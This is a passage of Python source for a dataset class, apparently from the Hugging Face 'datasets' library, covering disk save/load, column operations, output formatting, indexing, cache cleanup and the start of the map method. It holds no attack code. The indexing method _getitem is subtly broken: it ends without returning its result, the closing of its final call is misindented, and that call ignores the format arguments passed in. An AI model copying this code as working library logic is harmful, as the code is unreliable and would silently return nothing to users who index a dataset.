dest)\n # Change path to relative path from inside the destination directory\n data_file[\"filename\"] = filename\n # Get state\n state = self.__getstate__()\n dataset_info = json.loads(state.pop(\"_info\"))\n assert state.get(\"_data\") is None, \"arrow table needs to be memory mapped\"\n assert state.get(\"_indices\") is None, \"arrow table needs to be memory mapped\"\n assert all(\n len(h[\"transforms\"]) == 0 for h in state.get(\"_inplace_history\", [])\n ), \"in-place history needs to be empty\"\n # Serialize state\n with open(os.path.join(dataset_path, \"state.json\"), \"w\") as state_file:\n json.dump(state, state_file, indent=2, sort_keys=True)\n with open(os.path.join(dataset_path, \"dataset_info.json\"), \"w\") as dataset_info_file:\n json.dump(dataset_info, dataset_info_file, indent=2, sort_keys=True)\n logger.info(\"Dataset saved in {}\".format(dataset_path))\n\n @staticmethod\n def load_from_disk(dataset_path: str) -> \"Dataset\":\n \"\"\"Load the dataset from a dataset directory\n\n Args:\n dataset_path (``str``): path of the dataset directory where the dataset will be loaded from\n \"\"\"\n with open(os.path.join(dataset_path, \"state.json\"), \"r\") as state_file:\n state = json.load(state_file)\n 
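# \"state.json\" holds the attributes captured by __getstate__, while\n # \"dataset_info.json\" holds the DatasetInfo fields written separately\n # by save_to_disk above.\n 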
with open(os.path.join(dataset_path, \"dataset_info.json\"), \"r\") as dataset_info_file:\n dataset_info = json.load(dataset_info_file)\n state[\"_info\"] = json.dumps(dataset_info)\n dataset = Dataset.from_dict({})\n state = {k: state[k] for k in dataset.__dict__.keys()} # in case we add new fields\n # Change path to absolute path\n for data_file in state.get(\"_data_files\", []) + state.get(\"_indices_data_files\", []):\n data_file[\"filename\"] = os.path.join(dataset_path, data_file[\"filename\"])\n dataset.__setstate__(state)\n return dataset\n\n @property\n def data(self) -> pa.Table:\n \"\"\"The Apache Arrow table backing the dataset.\"\"\"\n return self._data\n\n @property\n def cache_files(self):\n \"\"\"The cache file containing the Apache Arrow table backing the dataset.\"\"\"\n return self._data_files\n\n @property\n def num_columns(self) -> int:\n \"\"\"Number of columns in the dataset.\"\"\"\n return self._data.num_columns\n\n @property\n def num_rows(self) -> int:\n \"\"\"Number of rows in the dataset (same as :func:`datasets.Dataset.__len__`).\"\"\"\n if self._indices is not None:\n return self._indices.num_rows\n return self._data.num_rows\n\n @property\n def column_names(self) -> List[str]:\n \"\"\"Names of the columns in the dataset. \"\"\"\n return self._data.column_names\n\n @property\n def shape(self) -> Tuple[int, int]:\n \"\"\"Shape of the dataset (number of rows, number of columns).\"\"\"\n if self._indices is not None:\n # tuple() takes a single iterable, so build the pair directly\n return (self._indices.num_rows, self._data.num_columns)\n return self._data.shape\n\n def unique(self, column: str) -> List[Any]:\n \"\"\"Return a list of the unique elements in a column.\n\n This is implemented in the low-level backend and as such, very fast.\n\n Args:\n column (:obj:`str`):\n column name (list all the column names with :func:`datasets.Dataset.column_names`)\n\n Returns: :obj:`list` of unique elements in the given column.\n\n \"\"\"\n if column not in self._data.column_names:\n raise ValueError(f\"Column ({column}) not in table columns ({self._data.column_names}).\")\n\n if self._indices is not None and self._indices.num_rows != self._data.num_rows:\n raise ValueError(\n f\"This dataset is a shallow copy using an indices mapping of another Dataset with {self._data.num_rows} rows. \"\n f\"The `Dataset.unique()` method is currently not handled on shallow copy. Please use `Dataset.flatten_indices()` \"\n f\"to create a deep copy of the dataset and be able to use `Dataset.unique()`.\"\n )\n\n return self._data.column(column).unique().to_pylist()\n\n @fingerprint(inplace=True)\n def dictionary_encode_column_(self, column: str):\n \"\"\"Dictionary encode a column.\n\n Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns)\n by storing a dictionary of the strings. 
This only affects the internal storage.\n\n Args:\n column (:obj:`str`):\n\n \"\"\"\n if column not in self._data.column_names:\n raise ValueError(f\"Column ({column}) not in table columns ({self._data.column_names}).\")\n casted_schema: pa.Schema = self._data.schema\n field_index = casted_schema.get_field_index(column)\n field: pa.Field = casted_schema.field(field_index)\n casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False)\n # pa.Schema is immutable: set() returns a new schema instead of\n # modifying in place, so the result must be kept.\n casted_schema = casted_schema.set(field_index, casted_field)\n self._data = self._data.cast(casted_schema)\n self.info.features = Features.from_arrow_schema(self._data.schema)\n\n @fingerprint(inplace=True)\n def flatten_(self, max_depth=16):\n \"\"\"Flatten the Table.\n Each column with a struct type is flattened into one column per struct field.\n Other columns are left unchanged.\n \"\"\"\n for depth in range(1, max_depth):\n if any(isinstance(field.type, pa.StructType) for field in self._data.schema):\n self._data = self._data.flatten()\n else:\n break\n if self.info is not None:\n self.info.features = Features.from_arrow_schema(self._data.schema)\n logger.info(\n \"Flattened dataset from depth {} to depth {}.\".format(depth, 1 if depth + 1 < max_depth else \"unknown\")\n )\n\n @fingerprint(inplace=True)\n def cast_(self, features: Features):\n \"\"\"\n Cast the dataset to a new set of features.\n\n You can also cast the columns using :func:`Dataset.map` with `features`, but :func:`cast_`\n is in-place (doesn't copy the data to a new dataset) and is thus faster.\n\n Args:\n features (:class:`datasets.Features`): New features to cast the dataset to.\n The name and order of the fields in the features must match the current column names.\n The type of the data must also be convertible from one type to the other.\n For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset.\n \"\"\"\n if list(features) != self._data.column_names:\n raise ValueError(\n f\"The columns in features ({list(features)}) must be identical and in the same order \"\n f\"as the columns in the dataset: {self._data.column_names}\"\n )\n\n self._info.features = features\n schema = pa.schema(features.type)\n self._data = self._data.cast(schema)\n\n @fingerprint(inplace=True)\n def remove_columns_(self, column_names: Union[str, List[str]]):\n \"\"\"\n Remove one or several column(s) in the dataset and\n the features associated to them.\n\n You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method\n is in-place (doesn't copy the data to a new dataset) and is thus faster.\n\n Args:\n column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove.\n \"\"\"\n if isinstance(column_names, str):\n column_names = [column_names]\n\n for column_name in column_names:\n if column_name not in self._data.column_names:\n raise ValueError(\n f\"Column name {column_name} not in the dataset. 
\"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n\n for column_name in column_names:\n del self._info.features[column_name]\n\n self._data = self._data.drop(column_names)\n\n @fingerprint(inplace=True)\n def rename_column_(self, original_column_name: str, new_column_name: str):\n \"\"\"\n Rename a column in the dataset and move the features associated to the original column under the new column name.\n\n You can also rename a column using :func:`Dataset.map` with `remove_columns` but the present method:\n - takes care of moving the original features under the new column name.\n - doesn't copy the data to a new dataset and is thus much faster.\n\n Args:\n original_column_name (:obj:`str`): Name of the column to rename.\n new_column_name (:obj:`str`): New name for the column.\n \"\"\"\n if original_column_name not in self._data.column_names:\n raise ValueError(\n f\"Original column name {original_column_name} not in the dataset. \"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n if new_column_name in self._data.column_names:\n raise ValueError(\n f\"New column name {original_column_name} already in the dataset. \"\n f\"Please choose a column name which is not already in the dataset. \"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n if not new_column_name:\n raise ValueError(\"New column name is empty.\")\n\n new_column_names = [new_column_name if col == original_column_name else col for col in self._data.column_names]\n\n self._info.features[new_column_name] = self._info.features[original_column_name]\n del self._info.features[original_column_name]\n\n self._data = self._data.rename_columns(new_column_names)\n\n def __len__(self):\n \"\"\" Number of rows in the dataset \"\"\"\n return self.num_rows\n\n def __iter__(self):\n \"\"\"Iterate through the examples.\n If a formatting is set with :func:`datasets.Dataset.set_format` rows will be returned with the\n selected format.\n \"\"\"\n format_type = self._format_type\n format_kwargs = self._format_kwargs\n format_columns = self._format_columns\n output_all_columns = self._output_all_columns\n for index in range(self.num_rows):\n yield self._getitem(\n index,\n format_type=format_type,\n format_columns=format_columns,\n output_all_columns=output_all_columns,\n format_kwargs=format_kwargs,\n )\n\n def __repr__(self):\n return f\"Dataset(features: {self.features}, num_rows: {self.num_rows})\"\n\n @property\n def format(self):\n return {\n \"type\": self._format_type,\n \"format_kwargs\": self._format_kwargs,\n \"columns\": self.column_names if self._format_columns is None else self._format_columns,\n \"output_all_columns\": self._output_all_columns,\n }\n\n @contextlib.contextmanager\n def formatted_as(\n self,\n type: Optional[str] = None,\n columns: Optional[List] = None,\n output_all_columns: bool = False,\n **format_kwargs,\n ):\n \"\"\"To be used in a `with` statement. 
Set __getitem__ return format (type and columns)\n\n Args:\n type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas']\n None means __getitem__ returns python objects (default)\n columns (Optional ``List[str]``): columns to format in the output\n None means __getitem__ returns all columns (default)\n output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects)\n format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`.\n \"\"\"\n old_format_type = self._format_type\n old_format_kwargs = self._format_kwargs\n old_format_columns = self._format_columns\n old_output_all_columns = self._output_all_columns\n try:\n self.set_format(type, columns, output_all_columns, **format_kwargs)\n yield\n finally:\n self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs)\n\n @fingerprint(inplace=True)\n def set_format(\n self,\n type: Optional[str] = None,\n columns: Optional[List] = None,\n output_all_columns: bool = False,\n **format_kwargs,\n ):\n \"\"\"Set __getitem__ return format (type and columns)\n\n Args:\n type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas']\n None means __getitem__ returns python objects (default)\n columns (Optional ``List[str]``): columns to format in the output\n None means __getitem__ returns all columns (default)\n output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects)\n format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`.\n \"\"\"\n # Check return type\n if type in [\"torch\", \"pytorch\", \"pt\"]:\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\"PyTorch needs to be installed to be able to return PyTorch tensors.\")\n type = \"torch\"\n elif type in [\"tensorflow\", \"tf\"]:\n try:\n import tensorflow # noqa: F401\n except ImportError:\n logger.error(\"Tensorflow needs to be installed to be able to return Tensorflow tensors.\")\n type = \"tensorflow\"\n elif type in [\"numpy\", \"np\"]:\n type = \"numpy\"\n elif type in [\"pandas\", \"pd\"]:\n type = \"pandas\"\n elif type in [None, \"python\"]:\n type = None\n else:\n assert not (\n type == \"pandas\" and (output_all_columns or format_kwargs)\n ), \"Format type 'pandas' doesn't allow the use of `output_all_columns` or `**format_kwargs`.\"\n assert (\n type is None or type == \"numpy\" or type == \"pandas\"\n ), \"Return type should be None or selected in ['numpy', 'torch', 'tensorflow', 'pandas'], but got '{}'\".format(\n type\n )\n\n # Check filter column\n if isinstance(columns, str):\n columns = [columns]\n if columns is not None and any(col not in self._data.column_names for col in columns):\n raise ValueError(\n \"Columns {} not in the dataset. 
Current columns in the dataset: {}\".format(\n list(filter(lambda col: col not in self._data.column_names, columns)), self._data.column_names\n )\n )\n\n format_kwargs.update(format_kwargs.pop(\"format_kwargs\", {})) # allow to use self.set_format(self.format)\n self._format_type = type\n self._format_kwargs = format_kwargs\n self._format_columns = columns\n self._output_all_columns = output_all_columns\n logger.info(\n \"Set __getitem__(key) output type to %s for %s columns \"\n \" (when key is int or slice) and %s output other (un-formatted) columns.\",\n \"python objects\" if type is None else type,\n \"no\" if columns is None else str(columns),\n \"do\" if output_all_columns else \"don't\",\n )\n\n def reset_format(self):\n \"\"\"Reset __getitem__ return format to python objects and all columns.\n\n Same as ``self.set_format()``\n \"\"\"\n self.set_format()\n\n def _convert_outputs(\n self, outputs, format_type=None, format_columns=None, output_all_columns=False, format_kwargs=None\n ):\n format_kwargs = format_kwargs if format_kwargs is not None else {}\n if format_type is None:\n if output_all_columns:\n return outputs\n if isinstance(outputs, dict) and format_columns is not None:\n return {k: v for k, v in outputs.items() if k in format_columns}\n return outputs\n\n map_nested_kwargs = {}\n if format_type == \"numpy\":\n if \"copy\" not in format_kwargs:\n format_kwargs[\"copy\"] = False\n command = partial(np.array, **format_kwargs)\n map_nested_kwargs[\"map_list\"] = False # convert lists to arrays\n elif format_type == \"torch\":\n import torch\n\n map_nested_kwargs[\"map_list\"] = False # convert lists to tensors\n\n def command(x):\n if isinstance(\n x, (list, tuple, np.ndarray)\n ): # add support for nested types like struct of list of struct\n x = np.array(x, copy=False)\n if x.dtype == np.object: # pytorch tensors cannot be instantiated from an array of objects\n return [map_nested(command, i, **map_nested_kwargs) for i in x]\n return torch.tensor(x, **format_kwargs)\n\n elif format_type == \"tensorflow\":\n import tensorflow\n\n map_nested_kwargs[\"map_list\"] = False # convert lists to tensors\n\n def command(x):\n if isinstance(\n x, (list, tuple, np.ndarray)\n ): # add support for nested types like struct of list of struct\n x = np.array(x, copy=False)\n if x.dtype == np.object: # tensorflow tensors can sometimes be instantiated from an array of objects\n try:\n return tensorflow.ragged.constant(x, **format_kwargs)\n except ValueError:\n return [map_nested(command, i, **map_nested_kwargs) for i in x]\n return tensorflow.ragged.constant(x, **format_kwargs)\n\n else:\n\n def identity(x):\n return x\n\n command = identity\n if isinstance(outputs, (list, tuple, np.ndarray, pd.Series)):\n return command(outputs)\n elif isinstance(outputs, pd.DataFrame):\n if format_columns is not None and not output_all_columns:\n to_remove_columns = [col for col in self.column_names if col not in format_columns]\n output_dict = outputs.drop(to_remove_columns, axis=1)\n else:\n output_dict = outputs\n else:\n output_dict = {}\n for k, v in outputs.items():\n if format_columns is not None and k not in format_columns and not output_all_columns:\n continue\n if format_columns is None or k in format_columns:\n v = map_nested(command, v, **map_nested_kwargs)\n output_dict[k] = v\n return output_dict\n\n @staticmethod\n def _unnest(py_dict):\n return dict((key, array[0]) for key, array in py_dict.items())\n\n @staticmethod\n def _nest(py_dict):\n return dict((key, [elem]) for key, elem in 
py_dict.items())\n\n def _map_indices(self, indices: Union[int, slice, pa.Array, Iterable]):\n if self._indices is None:\n return indices\n\n if isinstance(indices, int):\n return self._indices.column(0)[indices].as_py()\n\n slice_indices = None\n array_indices = None\n if isinstance(indices, slice):\n slice_indices = indices.indices(self.num_rows)\n # Check if the slice is a contiguous slice - else build an indices array\n if slice_indices[2] != 1 or slice_indices[1] < slice_indices[0]:\n array_indices = pa.array(list(range(*slice_indices)), type=pa.uint64())\n elif isinstance(indices, pa.Array):\n array_indices = indices\n elif isinstance(indices, Iterable):\n array_indices = pa.array([int(i) for i in indices], type=pa.uint64())\n\n # We can do a slice\n if array_indices is None:\n return self._indices.column(0).slice(slice_indices[0], slice_indices[1] - slice_indices[0])\n\n # We cannot do a slice, we need to do a take or some concatenation on pyarrow < 1.0.0\n if PYARROW_V0: # pre-1.0.0 backward compatibility\n data_array = pa.concat_tables(self._indices.slice(i.as_py(), 1) for i in array_indices).column(0)\n else:\n data_array = self._indices.column(0).take(array_indices)\n\n return data_array\n\n def _getitem(\n self,\n key: Union[int, slice, str],\n format_type=None,\n format_columns=None,\n output_all_columns=False,\n format_kwargs=None,\n ) -> Union[Dict, List]:\n \"\"\"\n Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools)\n \"\"\"\n # In the following, to convert data from the arrow table to dicts or lists,\n # we use .to_pandas().to_dict() or .to_pandas().to_list() as they are\n # significantly faster than .to_pydict() thanks to zero-copy and because it doesn't\n # call `list()` on every object in sequences of sequences of objects for example\n if isinstance(key, int):\n if key < 0:\n key = self.num_rows + key\n if key >= self.num_rows or key < 0:\n raise IndexError(f\"Index ({key}) outside of table length ({self.num_rows}).\")\n\n # Check if we need to convert indices\n key = self._map_indices(key)\n\n if format_type is not None:\n if format_type == \"pandas\":\n outputs = self._data.slice(key, 1).to_pandas(types_mapper=pandas_types_mapper)\n else:\n outputs = self._unnest(\n self._data.slice(key, 1).to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n )\n else:\n outputs = self._unnest(self._data.slice(key, 1).to_pydict())\n\n elif isinstance(key, slice):\n indices_array = None\n key_indices = key.indices(self.num_rows)\n\n # Check if the slice is a contiguous slice - else build an indices array\n if key_indices[2] != 1 or key_indices[1] < key_indices[0]:\n indices_array = pa.array(list(range(*key)), type=pa.uint64())\n\n # Check if we need to convert indices\n if self._indices is not None:\n indices_array = self._map_indices(indices_array if indices_array else key)\n # TODO: here we could add a check that the resulting indices are a contiguous slice\n # to avoid using 'take' instead of 'slice'\n\n # Get the subset of the table\n if indices_array is not None:\n # if PYARROW_V0: # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n data_subset = pa.concat_tables(\n self._data.slice(indices_array[i].as_py(), 1) for i in range(len(indices_array))\n )\n # else:\n # data_subset = self._data.take(indices_array)\n else:\n data_subset = self._data.slice(key_indices[0], key_indices[1] - key_indices[0])\n\n # Convert to the format\n if format_type is not None:\n if format_type == \"pandas\":\n 
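# for the \"pandas\" format, hand the converted DataFrame back directly\n 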
outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper)\n                else:\n                    outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n            else:\n                outputs = data_subset.to_pydict()\n\n        elif isinstance(key, str):\n            if key not in self._data.column_names:\n                raise ValueError(f\"Column ({key}) not in table columns ({self._data.column_names}).\")\n\n            # Check if we need to convert indices\n            if self._indices is not None:\n                indices_array = self._indices.column(0)\n                # if PYARROW_V0:  # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n                data_array = pa.concat_tables(self._data.slice(i.as_py(), 1) for i in indices_array).column(key)\n                # else:\n                #     data_array = self._data.column(key).take(indices_array)\n            else:\n                data_array = self._data.column(key)\n\n            if format_type is not None:\n                # We should use\n                # outputs = self._data[key].to_pandas(types_mapper=pandas_types_mapper)\n                # but there is a bug in pyarrow that makes it ignore the types_mapper in that case\n                # see https://issues.apache.org/jira/browse/ARROW-9664\n                # We build a table with one column and call to_pandas on it instead\n                one_column_table = pa.Table.from_arrays([data_array], schema=pa.schema([self._data.schema.field(key)]))\n                if format_columns is None or key in format_columns:\n                    if format_type == \"pandas\":\n                        outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key]\n                    else:\n                        outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key].to_list()\n                else:\n                    outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key].to_list()\n            else:\n                outputs = data_array.to_pylist()\n\n        elif isinstance(key, Iterable):\n            if len(key) > 0 and isinstance(key[0], (bool, np.bool_)):\n                if len(key) != self.__len__():\n                    raise ValueError(\n                        f\"Iterable with bool entries must be length of dataset ({self.__len__()}), \" f\"not {len(key)}\"\n                    )\n                indices = [i for i, val in enumerate(key) if val]\n            else:\n                indices = key\n\n            indices_array = pa.array([int(i) for i in indices], type=pa.uint64())\n\n            # Check if we need to convert indices\n            indices_array = self._map_indices(indices_array)\n\n            # TODO: here we could add a check that the resulting indices are a contiguous slice\n            # to avoid using 'take' instead of 'slice'\n\n            # if PYARROW_V0:  # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n            data_subset = pa.concat_tables(\n                self._data.slice(indices_array[i].as_py(), 1) for i in range(len(indices_array))\n            )\n            # else:\n            #     data_subset = self._data.take(indices_array)\n\n            if format_type is not None:\n                if format_type == \"pandas\":\n                    outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper)\n                else:\n                    outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n            else:\n                outputs = data_subset.to_pydict()\n\n        else:\n            raise ValueError(\"Can only get row(s) (int or slice or list[int]) or columns (string).\")\n\n        if format_type is not None or format_columns is not None:\n            outputs = self._convert_outputs(\n                outputs,\n                format_type=format_type,\n                format_columns=format_columns,\n                output_all_columns=output_all_columns,\n            
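# formatting state configured beforehand via `set_format` or `formatted_as`\n            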
format_kwargs=self._format_kwargs,\n        )\n\n    def cleanup_cache_files(self):\n        \"\"\"Clean up all cache files in the dataset cache directory, except the currently used cache file if there is one.\n        Be careful when running this command that no other process is currently using other cache files.\n\n        Returns:\n            Number of removed files\n        \"\"\"\n        if not self._data_files or \"filename\" not in self._data_files[0]:\n            return None\n        current_cache_files = [os.path.abspath(cache_file[\"filename\"]) for cache_file in self._data_files]\n        cache_directory = os.path.dirname(current_cache_files[0])\n        logger.info(f\"Listing files in {cache_directory}\")\n        files: List[str] = os.listdir(cache_directory)\n        files_to_remove = []\n        for f_name in files:\n            full_name = os.path.abspath(os.path.join(cache_directory, f_name))\n            if f_name.startswith(\"cache-\") and f_name.endswith(\".arrow\"):\n                if full_name in current_cache_files:\n                    logger.info(f\"Keeping currently used cache file at {full_name}\")\n                    continue\n                files_to_remove.append(full_name)\n        for file_path in files_to_remove:\n            logger.info(f\"Removing {file_path}\")\n            os.remove(file_path)\n        return len(files_to_remove)\n\n    def _get_cache_file_path(self, fingerprint):\n        cache_file_name = \"cache-\" + fingerprint + \".arrow\"\n        cache_directory = os.path.dirname(self._data_files[0][\"filename\"])\n        cache_file_path = os.path.join(cache_directory, cache_file_name)\n        return cache_file_path\n\n    def map(\n        self,\n        function: Optional[Callable] = None,\n        with_indices: bool = False,\n        input_columns: Optional[Union[str, List[str]]] = None,\n        batched: bool = False,\n        batch_size: Optional[int] = 1000,\n        drop_last_batch: bool = False,\n        remove_columns: Optional[List[str]] = None,\n        keep_in_memory: bool = False,\n        load_from_cache_file: bool = True,\n        cache_file_name: Optional[str] = None,\n        writer_batch_size: Optional[int] = 1000,\n        features: Optional[Features] = None,\n        disable_nullable: bool = False,\n        fn_kwargs: Optional[dict] = None,\n        num_proc: Optional[int] = None,\n        suffix_template: str = \"_{rank:05d}_of_{num_proc:05d}\",\n        new_fingerprint: Optional[str] = None,\n    ) -> \"Dataset\":\n        \"\"\"Apply a function to all the elements in the table (individually or in batches)\n        and update the table (if the function does update examples).\n\n        Args:\n            function (`callable`): with one of the following signatures:\n                - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False`\n                - `function(example: Union[Dict, Any], indices: int) -> Union[Dict, Any]` if `batched=False` and `with_indices=True`\n                - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False`\n                - `function(batch: Union[Dict[List], List[Any]], indices: List[int]) -> Union[Dict, Any]` if `batched=True` and `with_indices=True`\n                If no function is provided, default to identity function: lambda x: x\n            with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n            input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n                positional arguments. 
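For example, with `input_columns=\"text\"`, `function` receives only the values of the `text` column as its positional argument. 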
If `None`, a dict mapping to all formatted columns is passed as one argument.\n            batched (`bool`, defaults to `False`): Provide batch of examples to `function`\n            batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n                `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n            drop_last_batch (`bool`, default: `False`): Whether a last batch smaller than the batch_size should be\n                dropped instead of being processed by the function.\n            remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n                Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding\n                columns with names in `remove_columns`, these columns will be kept.\n            keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n            load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n                can be identified, use it instead of recomputing.\n            cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                results of the computation instead of the automatically generated cache file name.\n            writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n                Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n            features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file\n                instead of the automatically generated one.\n            disable_nullable (`bool`, defaults to `False`): Disallow null values in the table.\n            fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n            num_proc (`Optional[int]`, defaults to `None`): Number of processes for multiprocessing. By default it doesn't\n                use multiprocessing.\n            suffix_template (`str`, defaults to \"_{rank:05d}_of_{num_proc:05d}\"): If cache_file_name is specified, then this suffix\n                will be added at the end of the base name of each shard's cache file. For example, if cache_file_name is \"processed.arrow\", then for\n                rank=1 and num_proc=4, the resulting file would be \"processed_00001_of_00004.arrow\" for the default suffix.\n            new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n        \"\"\"\n        assert num_proc is None or num_proc > 0, \"num_proc must be an integer > 0.\"\n\n        # If the array is empty we do nothing\n        if len(self) == 0:\n            return self\n\n        if function is None:\n            function = lambda x: x  # noqa: E731\n\n        if isinstance(input_columns, str):\n            input_columns = [input_columns]\n\n        if input_columns is not None:\n            for input_column in input_columns:\n                if input_column not in self._data.column_names:\n                    raise ValueError(\n                        \"Input column {} not in the dataset. Current columns in the dataset: {}\".format(\n                            input_column, self._data.column_names\n                        )\n                    )\n\n        if fn_kwargs is None:\n            fn_kwargs = dict()\n\n        # Check if the function returns updated examples\n        def does_function_return_dict(inputs, indices):\n            \"\"\" Does the function return a dict. \"\"\"\n            fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns]\n            processed_inputs = (\n                function(*fn_args, indices, **fn_kwargs) if with_indices else function(*fn_args, **fn_kwargs)\n            )\n            does_return_dict = isinstance(processed_inputs, Mapping)\n\n            if does_return_dict is False and processed_inputs is not None:\n                raise TypeError(\n                    \"Provided `function` which is applied to all elements of table returns a variable of type {}. Make sure provided `function` returns a variable of type `dict` to update the dataset or `None` if you are only interested in side effects.\".format(\n                        type(processed_inputs)\n                    )\n                )\n            elif isinstance(indices, list) and does_return_dict is True:\n                allowed_batch_return_types = (list, np.ndarray)\n                all_dict_values_are_lists = all(\n                    isinstance(value, allowed_batch_return_types) for value in processed_inputs.values()\n                )\n                if all_dict_values_are_lists is False:\n                    raise TypeError(\n                        \"Provided `function` which is applied to all elements of table returns a `dict` of types {}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{}`.\".format(\n                            [type(x) for x in processed_inputs.values()], allowed_batch_return_types\n                        )\n                    )\n\n            return does_return_dict\n\n        # We only update the data table (and use the cache) if the function returns a dict.\n        # Test it on the first element or a small batch (0, 1) for batched inputs\n        logger.info(\"Testing the mapped function outputs\")\n        test_inputs = self[:2] if batched else self[0]\n        test_indices = [0, 1] if batched else 0\n        update_data = does_function_return_dict(test_inputs, test_indices)\n        logger.info(\"Testing finished, running the mapping function on the dataset\")\n\n        if num_proc is None or num_proc == 1:\n            return self._map_single(\n                function=function,\n                with_indices=with_indices,\n                input_columns=input_columns,\n                batched=batched,\n                batch_size=batch_size,\n                drop_last_batch=drop_last_batch,\n                remove_columns=remove_columns,\n                keep_in_memory=keep_in_memory,\n                load_from_cache_file=load_from_cache_file,\n                cache_file_name=cache_file_name,\n                writer_batch_size=writer_batch_size,\n                features=features,\n                disable_nullable=disable_nullable,\n                fn_kwargs=fn_kwargs,\n                new_fingerprint=new_fingerprint,\n                update_data=update_data,\n            )\n        else:\n\n            def format_cache_file_name(cache_file_name, rank):\n                sep = cache_file_name.rindex(\".\")\n                base_name, extension = cache_file_name[:sep], cache_file_name[sep:]\n                cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension\n                logger.info(\"Process #{} will write at {}\".format(rank, cache_file_name))\n                return cache_file_name\n\n            with Pool(num_proc, initargs=(RLock(),), initializer=tqdm.set_lock) as pool:\n                shards = [\n                    self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory)\n                    for rank in range(num_proc)\n                ]\n                kwds_per_shard = [\n                    dict(\n                        self=shards[rank],\n                        function=function,\n                        with_indices=with_indices,\n                        input_columns=input_columns,\n                        batched=batched,\n                        batch_size=batch_size,\n                        drop_last_batch=drop_last_batch,\n                        remove_columns=remove_columns,\n                        keep_in_memory=keep_in_memory,\n                        load_from_cache_file=load_from_cache_file,\n                        cache_file_name=format_cache_file_name(cache_file_name, rank)\n                        if cache_file_name is not None\n                        else None,\n                        writer_batch_size=writer_batch_size,\n                        features=features.copy() if features is not None else None,\n                        disable_nullable=disable_nullable,\n                        fn_kwargs=fn_kwargs,\n                        rank=rank,\n                        offset=sum(len(s) for s in shards[:rank]),\n                        update_data=update_data,\n                    
)\n                    for rank in range(num_proc)\n                ]\n                logger.info(\"Spawning {} processes\".format(num_proc))\n                results = [pool.apply_async(self.__class__._map_single, kwds=kwds) for kwds in kwds_per_shard]\n                transformed_shards = [r.get() for r in results]\n                logger.info(\"Concatenating {} shards from multiprocessing\".format(num_proc))\n                result = concatenate_datasets(transformed_shards)\n                if new_fingerprint is not None:\n                    result._fingerprint = new_fingerprint\n                return result\n\n    @transmit_format\n    @fingerprint(inplace=False)\n    def _map_single(\n        self,\n        function: Optional[Callable] = None,\n        with_indices: bool = False,\n        input_columns: Optional[Union[str, List[str]]] = None,\n        batched: bool = False,\n        batch_size: Optional[int] = 1000,\n        drop_last_batch: bool = False,\n        remove_columns: Optional[List[str]] = None,\n        keep_in_memory: bool = False,\n        load_from_cache_file: bool = True,\n        cache_file_name: Optional[str] = None,\n        writer_batch_size: Optional[int] = 1000,\n        features: Optional[Features] = None,\n        disable_nullable: bool = False,\n        fn_kwargs: Optional[dict] = None,\n        new_fingerprint: Optional[str] = None,\n        rank: Optional[int] = None,\n        offset: int = 0,\n        update_data=True,\n    ) -> \"Dataset\":\n        \"\"\"Apply a function to all the elements in the table (individually or in batches)\n        and update the table (if the function does update examples).\n\n        Args:\n            function (`callable`): with one of the following signatures:\n                - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False`\n                - `function(example: Union[Dict, Any], indices: int) -> Union[Dict, Any]` if `batched=False` and `with_indices=True`\n                - `function(batch: Union[Dict[List], 